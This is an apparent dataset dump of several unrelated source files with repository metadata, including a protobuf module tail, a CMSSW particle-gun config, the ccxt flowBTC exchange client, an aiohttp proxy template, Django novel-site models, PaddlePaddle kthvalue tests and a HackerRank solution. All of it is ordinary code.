_sym_db.RegisterMessage(AdGroupCriterion.PositionEstimates)
DESCRIPTOR._options = None
_ADGROUPCRITERION_QUALITYINFO.fields_by_name['quality_score']._options = None
_ADGROUPCRITERION_QUALITYINFO.fields_by_name['creative_quality_score']._options = None
_ADGROUPCRITERION_QUALITYINFO.fields_by_name['post_click_quality_score']._options = None
_ADGROUPCRITERION_QUALITYINFO.fields_by_name['search_predicted_ctr']._options = None
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['first_page_cpc_micros']._options = None
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['first_position_cpc_micros']._options = None
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['top_of_page_cpc_micros']._options = None
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['estimated_add_clicks_at_first_position_cpc']._options = None
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['estimated_add_cost_at_first_position_cpc']._options = None
_ADGROUPCRITERION.fields_by_name['resource_name']._options = None
_ADGROUPCRITERION.fields_by_name['criterion_id']._options = None
_ADGROUPCRITERION.fields_by_name['quality_info']._options = None
_ADGROUPCRITERION.fields_by_name['ad_group']._options = None
_ADGROUPCRITERION.fields_by_name['type']._options = None
_ADGROUPCRITERION.fields_by_name['negative']._options = None
_ADGROUPCRITERION.fields_by_name['system_serving_status']._options = None
_ADGROUPCRITERION.fields_by_name['approval_status']._options = None
_ADGROUPCRITERION.fields_by_name['disapproval_reasons']._options = None
_ADGROUPCRITERION.fields_by_name['effective_cpc_bid_micros']._options = None
_ADGROUPCRITERION.fields_by_name['effective_cpm_bid_micros']._options = None
_ADGROUPCRITERION.fields_by_name['effective_cpv_bid_micros']._options = None
_ADGROUPCRITERION.fields_by_name['effective_percent_cpc_bid_micros']._options = None
_ADGROUPCRITERION.fields_by_name['effective_cpc_bid_source']._options = None
_ADGROUPCRITERION.fields_by_name['effective_cpm_bid_source']._options = None
_ADGROUPCRITERION.fields_by_name['effective_cpv_bid_source']._options = None
_ADGROUPCRITERION.fields_by_name['effective_percent_cpc_bid_source']._options = None
_ADGROUPCRITERION.fields_by_name['position_estimates']._options = None
_ADGROUPCRITERION.fields_by_name['keyword']._options = None
_ADGROUPCRITERION.fields_by_name['placement']._options = None
_ADGROUPCRITERION.fields_by_name['mobile_app_category']._options = None
_ADGROUPCRITERION.fields_by_name['mobile_application']._options = None
_ADGROUPCRITERION.fields_by_name['listing_group']._options = None
_ADGROUPCRITERION.fields_by_name['age_range']._options = None
_ADGROUPCRITERION.fields_by_name['gender']._options = None
_ADGROUPCRITERION.fields_by_name['income_range']._options = None
_ADGROUPCRITERION.fields_by_name['parental_status']._options = None
_ADGROUPCRITERION.fields_by_name['user_list']._options = None
_ADGROUPCRITERION.fields_by_name['youtube_video']._options = None
_ADGROUPCRITERION.fields_by_name['youtube_channel']._options = None
_ADGROUPCRITERION.fields_by_name['topic']._options = None
_ADGROUPCRITERION.fields_by_name['user_interest']._options = None
_ADGROUPCRITERION.fields_by_name['webpage']._options = None
_ADGROUPCRITERION.fields_by_name['app_payment_model']._options = None
_ADGROUPCRITERION.fields_by_name['custom_affinity']._options = None
_ADGROUPCRITERION.fields_by_name['custom_intent']._options = None
_ADGROUPCRITERION.fields_by_name['custom_audience']._options = None
_ADGROUPCRITERION.fields_by_name['combined_audience']._options = None
_ADGROUPCRITERION._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
df84bf9d01fc1b6084257e37167497a0c70e75dd | a5a99f646e371b45974a6fb6ccc06b0a674818f2 | /Configuration/Generator/python/SingleElectronFlatPt5To100_pythia8_cfi.py | 37df2ba0d8904688e35cfd867a38350252f6e5ef | [
"Apache-2.0"
] | permissive | cms-sw/cmssw | 4ecd2c1105d59c66d385551230542c6615b9ab58 | 19c178740257eb48367778593da55dcad08b7a4f | refs/heads/master | 2023-08-23T21:57:42.491143 | 2023-08-22T20:22:40 | 2023-08-22T20:22:40 | 10,969,551 | 1,006 | 3,696 | Apache-2.0 | 2023-09-14T19:14:28 | 2013-06-26T14:09:07 | C++ | UTF-8 | Python | false | false | 813 | py | import FWCore.ParameterSet.Config as cms
generator = cms.EDFilter("Pythia8PtGun",
PGunParameters = cms.PSet(
        MaxPt = cms.double(100.),
        MinPt = cms.double(5.),
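        ## flat pT gun between 5 and 100 GeV, matching the 'pt 5 to 100' psethack label below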
ParticleID = cms.vint32(11),
AddAntiParticle = cms.bool(True),
MaxEta = cms.double(2.5),
MaxPhi = cms.double(3.14159265359),
MinEta = cms.double(-2.5),
MinPhi = cms.double(-3.14159265359) ## in radians
),
Verbosity = cms.untracked.int32(0), ## set to 1 (or greater) for printouts
psethack = cms.string('single electron pt 5 to 100'),
firstRun = cms.untracked.uint32(1),
PythiaParameters = cms.PSet(parameterSets = cms.vstring())
)
| [
"[email protected]"
] | |
7c258ecc296b93e65bf8e0cbc5b9c3df0c21f607 | 21818228cb62d31b9685de44deb27cfd90430573 | /ccxt/flowbtc.py | 2153a8b8e285212a60a2754aaf3d616c1ebb77d1 | [] | no_license | mico/cryptoArbitrage | d9d5d2f89e3fccc0b84d9c13b771edef0f2b00a1 | ea9ef03e79f302b36948746c77e4acbb3d6f01b7 | refs/heads/master | 2021-03-22T00:17:30.448593 | 2018-05-28T05:08:21 | 2018-05-28T05:08:21 | 108,232,310 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 7,310 | py | # -*- coding: utf-8 -*-
from ccxt.base.exchange import Exchange
from ccxt.base.errors import ExchangeError
class flowbtc (Exchange):
def describe(self):
return self.deep_extend(super(flowbtc, self).describe(), {
'id': 'flowbtc',
'name': 'flowBTC',
'countries': 'BR', # Brazil
'version': 'v1',
'rateLimit': 1000,
'hasCORS': True,
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/28162465-cd815d4c-67cf-11e7-8e57-438bea0523a2.jpg',
'api': 'https://api.flowbtc.com:8400/ajax',
'www': 'https://trader.flowbtc.com',
'doc': 'http://www.flowbtc.com.br/api/',
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
'uid': True,
},
'api': {
'public': {
'post': [
'GetTicker',
'GetTrades',
'GetTradesByDate',
'GetOrderBook',
'GetProductPairs',
'GetProducts',
],
},
'private': {
'post': [
'CreateAccount',
'GetUserInfo',
'SetUserInfo',
'GetAccountInfo',
'GetAccountTrades',
'GetDepositAddresses',
'Withdraw',
'CreateOrder',
'ModifyOrder',
'CancelOrder',
'CancelAllOrders',
'GetAccountOpenOrders',
'GetOrderFee',
],
},
},
})
def fetch_markets(self):
response = self.publicPostGetProductPairs()
markets = response['productPairs']
result = []
for p in range(0, len(markets)):
market = markets[p]
id = market['name']
base = market['product1Label']
quote = market['product2Label']
symbol = base + '/' + quote
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'info': market,
})
return result
def fetch_balance(self, params={}):
self.load_markets()
response = self.privatePostGetAccountInfo()
balances = response['currencies']
result = {'info': response}
for b in range(0, len(balances)):
balance = balances[b]
currency = balance['name']
account = {
'free': balance['balance'],
'used': balance['hold'],
'total': 0.0,
}
account['total'] = self.sum(account['free'], account['used'])
result[currency] = account
return self.parse_balance(result)
def fetch_order_book(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
orderbook = self.publicPostGetOrderBook(self.extend({
'productPair': market['id'],
}, params))
return self.parse_order_book(orderbook, None, 'bids', 'asks', 'px', 'qty')
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
ticker = self.publicPostGetTicker(self.extend({
'productPair': market['id'],
}, params))
timestamp = self.milliseconds()
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': float(ticker['high']),
'low': float(ticker['low']),
'bid': float(ticker['bid']),
'ask': float(ticker['ask']),
'vwap': None,
'open': None,
'close': None,
'first': None,
'last': float(ticker['last']),
'change': None,
'percentage': None,
'average': None,
'baseVolume': float(ticker['volume24hr']),
'quoteVolume': float(ticker['volume24hrProduct2']),
'info': ticker,
}
def parse_trade(self, trade, market):
timestamp = trade['unixtime'] * 1000
side = 'buy' if (trade['incomingOrderSide'] == 0) else 'sell'
return {
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': market['symbol'],
'id': str(trade['tid']),
'order': None,
'type': None,
'side': side,
'price': trade['px'],
'amount': trade['qty'],
}
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
response = self.publicPostGetTrades(self.extend({
'ins': market['id'],
'startIndex': -1,
}, params))
return self.parse_trades(response['trades'], market)
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
orderType = 1 if (type == 'market') else 0
order = {
'ins': self.market_id(symbol),
'side': side,
'orderType': orderType,
'qty': amount,
'px': price,
}
response = self.privatePostCreateOrder(self.extend(order, params))
return {
'info': response,
'id': response['serverOrderId'],
}
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
if 'ins' in params:
return self.privatePostCancelOrder(self.extend({
'serverOrderId': id,
}, params))
raise ExchangeError(self.id + ' requires `ins` symbol parameter for cancelling an order')
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + self.version + '/' + path
if api == 'public':
if params:
body = self.json(params)
else:
self.check_required_credentials()
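            # Private-call auth: sign nonce + uid + apiKey with the API secret
            # (ccxt's hmac defaults to SHA-256) and send the upper-cased hex
            # digest as 'apiSig' alongside 'apiKey' and 'apiNonce'.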
nonce = self.nonce()
auth = str(nonce) + self.uid + self.apiKey
signature = self.hmac(self.encode(auth), self.encode(self.secret))
body = self.json(self.extend({
'apiKey': self.apiKey,
'apiNonce': nonce,
'apiSig': signature.upper(),
}, params))
headers = {
'Content-Type': 'application/json',
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def request(self, path, api='public', method='GET', params={}, headers=None, body=None):
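        # flowBTC wraps every response in an 'isAccepted' flag; anything not
        # explicitly accepted is surfaced as an ExchangeError below.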
response = self.fetch2(path, api, method, params, headers, body)
if 'isAccepted' in response:
if response['isAccepted']:
return response
raise ExchangeError(self.id + ' ' + self.json(response))
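# Example usage sketch (hypothetical credentials; live network calls required):
#   exchange = flowbtc({'apiKey': '...', 'secret': '...', 'uid': '...'})
#   print(exchange.fetch_ticker('BTC/BRL'))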
| [
"[email protected]"
] | |
dcd8e325ace6b51794580b2b65cb39022b4d9256 | 837ebd601d0882e370522719606c975b9c815ad2 | /adm/templates/plugins/mediation/{{cookiecutter.name}}/main/application.py | 9ee876166f3b2151ae78f6033bb9438e0b514679 | [
"BSD-3-Clause"
] | permissive | dearith/mfserv | 8ba97e211d31a177fc6de160cd4b1f8555ebf600 | ad72e51bf77595a75dcb2600d7323f13e2c2fb4b | refs/heads/master | 2021-08-15T21:17:30.528351 | 2019-04-25T10:25:58 | 2019-04-25T10:25:58 | 183,577,154 | 0 | 0 | null | 2019-04-26T07:10:44 | 2019-04-26T07:10:43 | null | UTF-8 | Python | false | false | 2,141 | py | from aiohttp import web, ClientSession
from aiohttp_metwork_middlewares import mflog_middleware
CHUNK_SIZE = 4096 * 1024
STREAMING_MODE = True
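# With STREAMING_MODE enabled, handle() relays the backend body in CHUNK_SIZE
# pieces instead of buffering the whole payload in memory first.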
async def handle(request):
# Log something with context aware logger
log = request['mflog_logger']
http_method = request.method
url_path_qs = request.path_qs
log.info("got a %s call on %s" % (http_method, url_path_qs))
# For this example, we limit the service to GET/HEAD methods
if http_method not in ["GET", "HEAD"]:
return web.Response(status=405)
# Let's build the backend url
backend_url = "http://mybackend%s" % url_path_qs
async with ClientSession() as session:
log.info("calling %s on %s..." % (http_method, backend_url))
async with session.get(backend_url) as resp:
backend_status = resp.status
log.info("got an HTTP/%i status" % backend_status)
if not STREAMING_MODE:
######################
# NON STREAMING MODE #
######################
body = await resp.read()
response = web.Response(
headers={"Content-Type": resp.headers['Content-Type']},
body=body
)
else:
##################
# STREAMING MODE #
##################
# Let's prepare a streaming response
response = web.StreamResponse(
headers={"Content-Type": resp.headers['Content-Type']}
)
await response.prepare(request)
response.content_type = resp.headers['Content-Type']
# Let's stream the response body to avoid storing it in memory
while True:
chunk = await resp.content.read(CHUNK_SIZE)
if not chunk:
break
await response.write(chunk)
await response.write_eof()
return response
app = web.Application(middlewares=[mflog_middleware])
app.router.add_route('*', '/{tail:.*}', handle)
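# Note: under mfserv the exported `app` is picked up and served by the platform;
# for a quick standalone test, aiohttp's web.run_app(app) would also serve it.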
| [
"[email protected]"
] | |
c117af46846c1174ea7008f8552fa52b1505a9b8 | ebbfc69c9b14b8fd0e8b51abb0ba4f767abce6e9 | /sandbook/base/models/novel.py | 3e4e8fdb929f8cfbc346753c49db9354d87a73f8 | [] | no_license | lwaxx/novel | 0a882347dffaafb35f061eaf6301abe32254b54f | 5b538e85606cd22c34ac10f53438fc0d3ff131a0 | refs/heads/master | 2022-06-30T03:21:52.673001 | 2020-05-09T15:26:58 | 2020-05-09T15:26:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,965 | py | import os
import re
import time
from django.core.files.storage import FileSystemStorage
from django.db import models
from base.constants.novel import (
DEFAULT_COVER, NOVEL_STATUS_UNAPPROVED, NOVEL_STATUS_ACTIVE, NOVEL_STATUS_FINISHED,
NOVEL_STATUS_BLOCKED
)
from django.core.cache import cache
from general.utils.text import get_filename_extension, calc_word_count
class CategoryMixin:
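    """Mixin for models that keep their novel count in the cache under novel_count_key."""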
@property
def novel_count_key(self):
raise NotImplementedError
def novel_count(self):
return cache.get(self.novel_count_key)
class Category(CategoryMixin, models.Model):
"""
    Top-level category.
"""
name = models.CharField('名称', max_length=32)
description = models.CharField('描述', max_length=255)
class Meta:
db_table = 'base_novel_category'
def __str__(self):
return self.name
@property
def novel_count_key(self):
return 'sc_%d_count' % self.id
class SubCategory(CategoryMixin, models.Model):
"""
    Second-level category.
"""
name = models.CharField('名称', max_length=32)
category = models.ForeignKey(Category, on_delete=models.CASCADE, verbose_name='一级分类')
description = models.CharField('描述', max_length=255)
class Meta:
db_table = 'base_novel_sub_category'
default_permissions = ()
def __str__(self):
return self.name
@property
def novel_count_key(self):
return 'c_%d_count' % self.id
def incr_novel_count(self, count: int):
"""
        count may be a positive or negative integer
"""
cache.incr(self.novel_count_key, count)
def cover_path(instance, filename):
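    # Covers land under novel/cover/<author_id>/<unix timestamp>.<original extension>.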
new_name = '%s.%s' % (str(int(time.time())), get_filename_extension(filename))
return os.path.join('novel', 'cover', str(instance.author_id), new_name)
class Novel(models.Model):
"""
    Novel.
"""
STATUS = {
'unapproved': NOVEL_STATUS_UNAPPROVED,
'active': NOVEL_STATUS_ACTIVE,
'finished': NOVEL_STATUS_FINISHED,
'blocked': NOVEL_STATUS_BLOCKED,
}
STATUS_CHOICES = (
(STATUS['unapproved'], '未审核'),
(STATUS['active'], '连载中'),
(STATUS['finished'], '已完结'),
(STATUS['blocked'], '已屏蔽')
)
    name = models.CharField('书名', unique=True, max_length=64)  # TODO: validate the title
author = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True, verbose_name='作者')
intro = models.TextField('简介', max_length=1024)
status = models.SmallIntegerField('状态', choices=STATUS_CHOICES, default=NOVEL_STATUS_UNAPPROVED)
category = models.ForeignKey(Category, on_delete=models.SET_NULL, null=True, verbose_name='一级分类')
sub_category = models.ForeignKey(SubCategory, on_delete=models.SET_NULL, null=True, verbose_name='二级分类')
cover = models.ImageField(
'封面', storage=FileSystemStorage(), default=DEFAULT_COVER,
upload_to=cover_path, blank=True
)
word_count = models.PositiveIntegerField('字数', default=0)
created_at = models.DateTimeField('创建于', auto_now_add=True)
updated_at = models.DateTimeField('更新于', auto_now=True)
class Meta:
db_table = 'base_novel'
ordering = ('-id',)
default_permissions = ()
permissions = (
('view_novel', '查看小说'),
('create_novel', '创建小说'),
('change_novel', '更改小说'),
('delete_novel', '删除小说'),
('finish_novel', '完结小说'),
('block_novel', '屏蔽小说'),
('verify_novel', '审核小说')
)
class NovelComment(models.Model):
"""
    Review (comment) on a novel.
"""
novel = models.ForeignKey(Novel, on_delete=models.CASCADE, verbose_name='小说', related_name='comments', )
user = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True, verbose_name='用户',
related_name='nc_user')
    title = models.CharField('标题', max_length=32, blank=True)  # the title is optional
content = models.CharField('内容', max_length=4096)
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_comment'
default_permissions = ()
class NovelCommentReply(models.Model):
"""
    Reply to a novel review.
"""
comment = models.ForeignKey(NovelComment, on_delete=models.CASCADE, related_name='replies',
verbose_name='书评')
content = models.CharField('内容', max_length=1024)
user = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True,
related_name='nc_reply_user', verbose_name='回复用户')
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_comment_reply'
default_permissions = ()
class Volume(models.Model):
"""
    Volume.
"""
name = models.CharField('卷名', max_length=32, default='正文卷')
novel = models.ForeignKey(Novel, on_delete=models.CASCADE, verbose_name='小说')
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_volume'
default_permissions = ()
class Chapter(models.Model):
"""
    Chapter.
"""
STATUS = {
'saved': 0,
'submitted': 1,
'blocked': 2,
        'approved': 3  # not used yet
}
STATUS_CHOICES = (
(STATUS['saved'], '已保存'),
(STATUS['submitted'], '已提交'),
(STATUS['blocked'], '已屏蔽'),
(STATUS['approved'], '已审核')
)
    title = models.CharField('标题', max_length=32, blank=True, default='新章节')  # TODO: validate the chapter title
content = models.TextField('内容', max_length=65535, blank=True)
volume = models.ForeignKey(Volume, on_delete=models.CASCADE, verbose_name='卷')
word_count = models.PositiveIntegerField('字数', default=0)
is_free = models.BooleanField('免费', default=True)
status = models.IntegerField('状态', choices=STATUS_CHOICES, default=STATUS['saved'])
created_at = models.DateTimeField('创建于', auto_now_add=True)
updated_at = models.DateTimeField('更新于', auto_now=True)
class Meta:
db_table = 'base_novel_chapter'
default_permissions = ()
# class ChapterUpdated(models.Model):
# ...
class Paragraph(models.Model):
"""
    Paragraph.
"""
chapter = models.ForeignKey(Chapter, on_delete=models.CASCADE, verbose_name='章节')
    content = models.TextField('内容', max_length=65535)  # TODO: enforce a paragraph length limit
serial = models.PositiveIntegerField('序号', default=1)
class Meta:
db_table = 'base_novel_paragraph'
default_permissions = ()
unique_together = (('chapter', 'serial'),)
@property
def word_count(self):
return calc_word_count(self.content)
class ParagraphComment(models.Model):
"""
    Comment on a paragraph.
"""
paragraph = models.ForeignKey(Paragraph, on_delete=models.CASCADE, verbose_name='段落')
user = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True, verbose_name='用户')
content = models.CharField('内容', max_length=1024)
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_paragraph_comment'
default_permissions = ()
class ParagraphCommentReply(models.Model):
"""
    Reply to a paragraph comment.
"""
paragraph_comment = models.ForeignKey(ParagraphComment, on_delete=models.CASCADE, verbose_name='段评')
user = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True,
related_name='pc_reply_user', verbose_name='回复用户')
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_paragraph_comment_reply'
default_permissions = ()
| [
"[email protected]"
] | |
dcd9d496ee0141ea04f9a8c83b711f5ce5252089 | ffc1cc3bb7b68335b115122fdc7924fc4e31d528 | /pro38.py | fd23c4fc45f9509da980b95618a4cae2a5d6442b | [] | no_license | Rihanashariff/swathi24 | dba1dd3c3d2ff583ae431b432e0ef262bfeb3ac3 | 2b0d21f2febdd2a563e8f0affeebd5ca7a5821b8 | refs/heads/master | 2020-07-02T05:28:32.199982 | 2019-06-29T08:22:10 | 2019-06-29T08:22:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 132 | py | #s
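# Count the members whose previous participations plus k more fit within the
# limit of 5 (the i + k <= 5 check); every 3 such members can form one team.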
n, k = map(int, input().split())
l = list(map(int, input().split()))
c = 0
for i in l:
    if i + k <= 5:
        c += 1
g = c // 3
print(g)
| [
"[email protected]"
] | |
cc09ec3dc544f923a01256d80c96928a1ec33d28 | 0dc24a6e729a4b438fbcd9cfb72da3b6ee716d77 | /ksiazka_zrob_to_sam/my_electric_car.py | 10fbec7652bb7144eb706ddd63de707e5df80507 | [] | no_license | Licho59/learning_python_eric_matthes_book | fca84a2bff207c10dec20c7fea9aeacf05d6a101 | 969f95132822d8bd21c30403d8e0bf6aadb9914f | refs/heads/master | 2021-09-01T03:41:37.281741 | 2017-12-24T15:12:13 | 2017-12-24T15:12:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 784 | py | # -*- coding: utf-8 -*-
"""
Created on Mon May 8 21:20:17 2017
@author: Leszek
"""
from car import ElectricCar
my_tesla = ElectricCar('tesla', 'model s', 2016)
print(my_tesla.get_descriptive_name())
my_tesla.battery.describe_battery()
my_tesla.battery.get_range()
# Importing multiple classes from a module
from car import Car, ElectricCar
my_beetle = Car('volkswagen', 'beetle', 2016)
print(my_beetle.get_descriptive_name())
my_tesla = ElectricCar('tesla', 'model s', 2016)
print(my_tesla.get_descriptive_name())
# Importing an entire module
import car
my_beetle = car.Car('volkswagen', 'beetle', 2016)
print(my_beetle.get_descriptive_name())
my_tesla = car.ElectricCar('tesla', 'model s', 2016)
print(my_tesla.get_descriptive_name())
# Importing all classes from a module
from car import *
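# Note: the wildcard import pulls in every public name from car; the explicit
# imports above make the origin of each class clearer.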
| [
"[email protected]"
] | |
5487773f243f788ebc92256016ebad447a41750c | d5f75adf5603927396bdecf3e4afae292143ddf9 | /python/paddle/fluid/tests/unittests/test_kthvalue_op.py | 66eb8ab4f31fba1ef8cb7eee8a8896077b683a1f | [
"Apache-2.0"
] | permissive | jiweibo/Paddle | 8faaaa1ff0beaf97ef7fb367f6c9fcc065f42fc4 | 605a2f0052e0ffb2fab3a4cf4f3bf1965aa7eb74 | refs/heads/develop | 2023-07-21T03:36:05.367977 | 2022-06-24T02:31:11 | 2022-06-24T02:31:11 | 196,316,126 | 3 | 2 | Apache-2.0 | 2023-04-04T02:42:53 | 2019-07-11T03:51:12 | Python | UTF-8 | Python | false | false | 6,945 | py | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from op_test import OpTest
import paddle
import paddle.fluid as fluid
def cal_kthvalue(x, k, axis, keepdim=False):
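    # NumPy reference: sort along `axis` and take the (k-1)-th slice of the
    # sorted values and argsort indices, e.g.
    # cal_kthvalue(np.array([[3, 1, 2]]), k=2, axis=1) -> (array([2]), array([2]))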
if axis < 0:
axis = len(x.shape) + axis
indices = np.argsort(x, axis=axis)
value = np.sort(x, axis=axis)
indices = indices.take(indices=k - 1, axis=axis)
value = value.take(indices=k - 1, axis=axis)
if keepdim:
indices = np.expand_dims(indices, axis)
value = np.expand_dims(value, axis)
return value, indices
class TestKthvalueOp(OpTest):
def init_args(self):
self.k = 5
self.axis = -1
def setUp(self):
self.op_type = "kthvalue"
self.python_api = paddle.kthvalue
self.dtype = np.float64
self.input_data = np.random.random((2, 1, 2, 4, 10))
self.init_args()
self.inputs = {'X': self.input_data}
self.attrs = {'k': self.k, 'axis': self.axis}
output, indices = cal_kthvalue(self.input_data,
k=self.k,
axis=self.axis)
self.outputs = {'Out': output, 'Indices': indices}
def test_check_output(self):
paddle.enable_static()
self.check_output(check_eager=True)
def test_check_grad(self):
paddle.enable_static()
self.check_grad(set(['X']), 'Out', check_eager=True)
class TestKthvalueOpWithKeepdim(OpTest):
def init_args(self):
self.k = 2
self.axis = 1
def setUp(self):
self.init_args()
self.op_type = "kthvalue"
self.python_api = paddle.kthvalue
self.dtype = np.float64
self.input_data = np.random.random((1, 3, 2, 4, 10))
self.inputs = {'X': self.input_data}
self.attrs = {'k': self.k, 'axis': self.axis, 'keepdim': True}
output, indices = cal_kthvalue(self.input_data,
k=self.k,
axis=self.axis,
keepdim=True)
self.outputs = {'Out': output, 'Indices': indices}
def test_check_output(self):
paddle.enable_static()
self.check_output(check_eager=True)
def test_check_grad(self):
paddle.enable_static()
self.check_grad(set(['X']), 'Out', check_eager=True)
class TestKthvalueOpKernels(unittest.TestCase):
def setUp(self):
self.axises = [2, -1]
def test_kthvalue_op(self):
paddle.disable_static()
def test_cpu_kernel():
shape = (2, 128, 10)
k = 2
paddle.set_device('cpu')
inputs = np.random.random(shape)
tensor = paddle.to_tensor(inputs)
for axis in self.axises:
value_expect, indice_expect = cal_kthvalue(inputs, k, axis)
v, inds = paddle.kthvalue(tensor, k, axis)
self.assertTrue(np.allclose(v.numpy(), value_expect))
self.assertTrue(np.allclose(inds.numpy(), indice_expect))
def test_gpu_kernel():
shape = (2, 30, 250)
k = 244
paddle.set_device('gpu')
inputs = np.random.random(shape)
tensor = paddle.to_tensor(inputs)
for axis in self.axises:
value_expect, indice_expect = cal_kthvalue(inputs, k, axis)
v, inds = paddle.kthvalue(tensor, k, axis)
self.assertTrue(np.allclose(v.numpy(), value_expect))
self.assertTrue(np.allclose(inds.numpy(), indice_expect))
test_cpu_kernel()
if fluid.core.is_compiled_with_cuda():
test_gpu_kernel()
class TestKthvalueOpWithNaN(unittest.TestCase):
def setUp(self):
paddle.disable_static()
self.x = paddle.uniform([2, 200, 10], dtype='float32')
def test_errors(self):
def test_nan_in_cpu_kernel():
paddle.set_device('cpu')
nan_position = 100
self.x[0, nan_position, 2] = float('nan')
v, inds = self.x.kthvalue(k=200, axis=1)
self.assertTrue(np.isnan(v[0, 2].numpy()[0]))
self.assertEqual(inds[0, 2].numpy()[0], nan_position)
def test_nan_in_gpu_kernel():
paddle.set_device('gpu')
nan_position = 100
self.x[0, nan_position, 2] = float('nan')
v, inds = self.x.kthvalue(k=200, axis=1)
self.assertTrue(np.isnan(v[0, 2].numpy()[0]))
self.assertEqual(inds[0, 2].numpy()[0], nan_position)
test_nan_in_cpu_kernel()
if fluid.core.is_compiled_with_cuda():
test_nan_in_gpu_kernel()
class TestKthvalueOpErrors(unittest.TestCase):
def setUp(self):
self.x = paddle.uniform([2, 10, 20, 25], dtype='float32')
def test_errors(self):
paddle.disable_static()
def test_k_lowrange_error():
self.x.kthvalue(k=0, axis=2)
self.assertRaises(ValueError, test_k_lowrange_error)
def test_k_uprange_error():
self.x.kthvalue(k=500, axis=2)
self.assertRaises(ValueError, test_k_uprange_error)
def test_dim_range_error():
self.x.kthvalue(k=10, axis=5)
self.assertRaises(ValueError, test_dim_range_error)
class TestModeOpInStatic(unittest.TestCase):
def setUp(self):
np.random.seed(666)
self.input_data = np.random.random((2, 20, 1, 2, 80)).astype(np.float64)
self.k = 10
def test_run_static(self):
paddle.enable_static()
with paddle.static.program_guard(paddle.static.Program(),
paddle.static.Program()):
input_tensor = paddle.static.data(name="x",
shape=[2, 20, 1, 2, 80],
dtype="float64")
result = paddle.kthvalue(input_tensor, self.k, axis=1)
expect_value = cal_kthvalue(self.input_data, self.k, axis=1)[0]
exe = paddle.static.Executor(paddle.CPUPlace())
paddle_result = exe.run(feed={"x": self.input_data},
fetch_list=[result])[0]
self.assertTrue(np.allclose(paddle_result, expect_value))
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
a272e1b11c4ec4f975a6dd241d020af9876ef059 | 6d8ed9e06e7783443fac3d100a4fdea304d5d64e | /dashboard/internet_nl_dashboard/migrations/0036_urllistreport_average_internet_nl_score.py | de64746ac2b34bee044538ef4f70302d905e030b | [
"Apache-2.0"
] | permissive | internetstandards/Internet.nl-dashboard | 399c6d13d66bbc56b1a5b964a727cc299d351bd8 | f1f68352a173689e2386d790f69bd28640a75e09 | refs/heads/main | 2023-08-31T21:01:42.739287 | 2023-07-12T10:51:16 | 2023-07-12T10:51:16 | 175,843,928 | 7 | 8 | Apache-2.0 | 2023-09-13T08:45:51 | 2019-03-15T15:16:49 | JavaScript | UTF-8 | Python | false | false | 667 | py | # Generated by Django 2.2.2 on 2019-06-28 07:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('internet_nl_dashboard', '0035_auto_20190624_0712'),
]
operations = [
migrations.AddField(
model_name='urllistreport',
name='average_internet_nl_score',
field=models.FloatField(
                default=0, help_text='Internet.nl scores are retrieved in points. The calculation done for that is complex and subject to change over time. Therefore it is impossible to re-calculate that score here. Instead the score is stored as a given.'),
),
]
| [
"[email protected]"
] | |
b363e6a7cb06107e6b57f522269db06f2372e699 | 7be4f595d555614a28f708c1ba7edda321f0cf30 | /practice/algorithms/implementation/find_digits/find_digits.py | 944aa7f96b379dc5bf1efe15f35da50bb098ef74 | [] | no_license | orel1108/hackerrank | de31a2d31aaf8aeb58477d1f2738744bfe492555 | 55da1f3a94e8c28ed0f0dea3103e51774f0047de | refs/heads/master | 2021-04-09T17:38:25.112356 | 2017-01-22T11:21:19 | 2017-01-22T11:21:19 | 50,198,159 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | t = int(raw_input())
for _ in range(t):
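    # a digit d of n counts when d is non-zero and divides n evenly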
n = raw_input()
digits = map(int, n)
print len(filter(lambda x: x > 0 and int(n) % x == 0, digits))
| [
"[email protected]"
] | |
